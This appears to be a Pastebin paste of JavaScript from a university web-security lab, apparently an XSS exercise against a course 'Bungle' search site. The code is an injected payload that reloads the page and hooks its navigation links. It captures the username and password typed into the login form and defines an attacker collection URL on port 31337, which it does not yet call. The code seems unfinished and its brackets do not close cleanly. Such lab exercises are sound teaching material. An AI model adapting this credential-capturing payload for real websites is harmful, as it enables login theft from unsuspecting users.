Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function proxy(href) {
- $("html").load(href, function(){
- $("html").show();
- var xssdefense = 0;
- var attacker = "http://127.0.0.1:31337/stolen";
- var payload = window.location.search.substr(1).split("&")[1].split("=")[1];
- var url = "./search?xssdefense=" + xssdefense.toString() + "&q=" + payload;
- alert(url);
- $("#query").val("pwned!");
- $("#bungle-lnk, #search-again-btn").click(function(e) {
- log("clicked home");
- e.preventDefault();
- proxy("./");
- });
- $("#search-btn").click(function(e) {
- log("clicked search-btn");
- e.preventDefault();
- proxy("./search");
- });
- $(".history-item").click(function(e) {
- var href = $(this).attr("href");
- log("clicked history item");
- e.preventDefault();
- proxy(href);
- });
- $("#log-in-btn").click(function(e) {
- e.preventDefault();
- log("clicked login");
- var username = $("#username").val();
- var userpass = $("#userpass").val();
- alert(username);
- $.ajax({
- type: "POST",
- url: "http://trurl.cs.illinois.edu/login",
- dataType: "text",
- data: {
- username: username,
- password: userpass
- },
- success: function(){
- alert("successful login");
- }
- });
- proxy("./login");
- });
- });
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement